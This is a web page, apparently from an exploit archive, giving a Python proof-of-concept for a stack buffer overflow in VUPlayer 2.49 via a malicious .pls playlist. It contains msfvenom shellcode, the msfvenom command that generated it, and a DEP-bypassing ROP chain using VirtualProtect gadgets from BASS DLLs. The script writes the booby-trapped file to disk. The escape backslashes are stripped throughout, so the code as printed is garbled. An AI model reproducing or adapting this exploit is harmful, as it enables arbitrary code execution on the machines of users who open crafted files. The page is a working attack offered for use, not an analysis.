Home / os / winmobile

VUPlayer 2.49 .pls Stack Buffer Overflow

Posted on 03 August 2016

#!/usr/bin/python

import os,sys

#Tested Windows 7 Home x86 & Windows 10 Home x86_x64

#badchars x00x0ax1ax20x40
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "x00x0ax1ax20x40" -f python

buf = ""
buf += "xbfx3bx99xddxa3xdbxc4xd9x74x24xf4x58x29"
buf += "xc9xb1x33x31x78x12x03x78x12x83xfbx9dx3f"
buf += "x56x07x75x36x99xf7x86x29x13x12xb7x7bx47"
buf += "x57xeax4bx03x35x07x27x41xadx9cx45x4exc2"
buf += "x15xe3xa8xedxa6xc5x74xa1x65x47x09xbbxb9"
buf += "xa7x30x74xccxa6x75x68x3fxfax2exe7x92xeb"
buf += "x5bxb5x2ex0dx8cxb2x0fx75xa9x04xfbxcfxb0"
buf += "x54x54x5bxfax4cxdex03xdbx6dx33x50x27x24"
buf += "x38xa3xd3xb7xe8xfdx1cx86xd4x52x23x27xd9"
buf += "xabx63x8fx02xdex9fxecxbfxd9x5bx8fx1bx6f"
buf += "x7ex37xefxd7x5axc6x3cx81x29xc4x89xc5x76"
buf += "xc8x0cx09x0dxf4x85xacxc2x7dxddx8axc6x26"
buf += "x85xb3x5fx82x68xcbx80x6axd4x69xcax98x01"
buf += "x0bx91xf6xd4x99xafxbfxd7xa1xafxefxbfx90"
buf += "x24x60xc7x2cxefxc5x37x67xb2x6fxd0x2ex26"
buf += "x32xbdxd0x9cx70xb8x52x15x08x3fx4ax5cx0d"
buf += "x7bxccx8cx7fx14xb9xb2x2cx15xe8xd0xb3x85"
buf += "x70x39x56x2ex12x45"

rop = "xe7x5fx01x10" #POP EAX # RETN [BASS.dll]
rop += "x5cxe2x60x10" #ptr to &VirtualProtect() [IAT BASSMIDI.dll]
rop += "xf1xeax01x10" #MOV EAX,DWORD PTR DS:[EAX] # RTN [BASS.dll]
rop += "x50x09x03x10" #XCHG EAX,ESI # RETN [BASS.dll]
rop += "x0cx80x60x10" #POP EBP # RETN 0x0C [BASSMIDI.dll]
rop += "x9fx53x10x10" #& jmp esp BASSWMA.dll
rop += "xe7x5fx01x10" #POP EAX # RETN [BASS.dll]
rop += "x90"*12
rop += "xffxfdxffxff" #201 in negative
rop += "xb4x4dx01x10" #NEG EAX # RETN [BASS.dll]
rop += "x72x2fx03x10" #XCHG EAX,EBX # RETN [BASS.dll]
rop += "xe7x5fx01x10" #POP EAX # RETN [BASS.dll]
rop += "xc0xffxffxff" #40 in negative
rop += "xb4x4dx01x10" #NEG EAX # RETN [BASS.dll]
rop += "x6cx8ax03x10" #XCHG EAX,EDX # RETN [BASS.dll]
rop += "x07x10x10x10" #POP ECX # RETN [BASSWMA.dll]
rop += "x93x83x10x10" #&Writable location [BASSWMA.dll]
rop += "x04xdcx01x10" #POP EDI # RETN [BASS.dll]
rop += "x84xa0x03x10" #RETN [BASS.dll]
rop += "xe7x5fx01x10" #POP EAX # RETN [BASS.dll]
rop += "x90"*4
rop += "xa5xd7x01x10" #PUSHAD # RETN [BASS.dll]

exploit = "x41"*1012 + rop + "x90"*8 + buf

print "len + " + str(len(rop))

file = open('/root/Desktop/exploit_development/VUPlayer/boom.pls','w')
file.write(exploit)
file.close()

 

TOP

Malware :

Exploits :